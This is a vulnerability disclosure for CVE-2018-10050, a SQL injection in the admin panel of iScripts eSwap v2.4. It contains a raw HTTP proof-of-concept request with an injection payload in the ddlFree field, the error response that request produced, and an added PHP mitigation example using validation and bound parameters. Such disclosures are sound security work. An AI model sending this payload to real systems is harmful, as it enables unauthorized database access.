CVE-2018-10050

ManhNho, Apr 11th, 2018 (edited)
# Exploit title: iScripts eSwap v2.4 - SQL injection via the registration_settings.php Admin Panel
# Date: 11/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/eswap
# Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
# Version: 2.4
# CVE: CVE-2018-10050
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
iScripts eSwap v2.4 has SQL injection via the ddlFree parameter of "registration_settings.php" in the Admin Panel.


#2. Proof of Concept
-----------------------------------------------------

Request:

POST /eswap/demo//admin/registration_settings.php?act=post HTTP/1.1
Host: www.demo.iscripts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Cookie: __utma=227100805.298811387.1522637403.1523431492.1523438388.8; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; __utma=129714457.1603653646.1523416273.1523416273.1523433224.2; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; PHPSESSID=i3nkqgvua59eplfm18urecqdb1; __utmb=227100805; __utmc=227100805; hs-messages-is-open=false
Connection: close
Upgrade-Insecure-Requests: 1

ddlFree= 1' order by 10 # &txtDate=1

Response:

HTTP/1.1 200 OK
Date: Wed, 11 Apr 2018 10:06:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 2645
...
<div class="clear"></div>
</div>
</div>
Unknown column '10' in 'order clause'
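
#3. Mitigation example (added)
-----------------------------------------------------
Added example, not the vendor's code and not part of the original paste: one way to handle the two POST fields from the request above so that the ddlFree value is validated and bound rather than concatenated, and so that database errors such as the one in the response are logged instead of reflected. The table and column names, the accepted value ranges, the integer treatment of txtDate and the in-memory SQLite database are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical schema: the vendor's real table and column names are not on this page.
function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE registration_settings (id INTEGER PRIMARY KEY, free_period INTEGER, start_date TEXT)');
    $db->exec("INSERT INTO registration_settings VALUES (1, 0, '')");
    return $db;
}

// Returns true when the settings were saved, false when the input was rejected.
function save_registration_settings(PDO $db, array $post): bool {
    // ddlFree comes from a drop-down, so only a bounded integer is accepted (range assumed).
    $free = filter_var($post['ddlFree'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 365]]);
    // txtDate is assumed to be an integer as well (the request above sends txtDate=1).
    $date = filter_var($post['txtDate'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 31]]);
    if ($free === false || $date === false) {
        return false; // reject instead of passing the raw string on to SQL
    }
    try {
        // Values are bound, never concatenated, so quotes and '#' remain data.
        $stmt = $db->prepare('UPDATE registration_settings SET free_period = :free, start_date = :d WHERE id = 1');
        $stmt->execute([':free' => $free, ':d' => (string) $date]);
        return true;
    } catch (PDOException $e) {
        // Log server-side; never echo the database error into the HTML response.
        error_log('registration_settings update failed: ' . $e->getMessage());
        return false;
    }
}

$db = open_demo_db();
// Constructed inputs: the body from the request above, then a legitimate submission.
var_dump(save_registration_settings($db, ['ddlFree' => " 1' order by 10 # ", 'txtDate' => '1']));
var_dump(save_registration_settings($db, ['ddlFree' => '1', 'txtDate' => '1']));
```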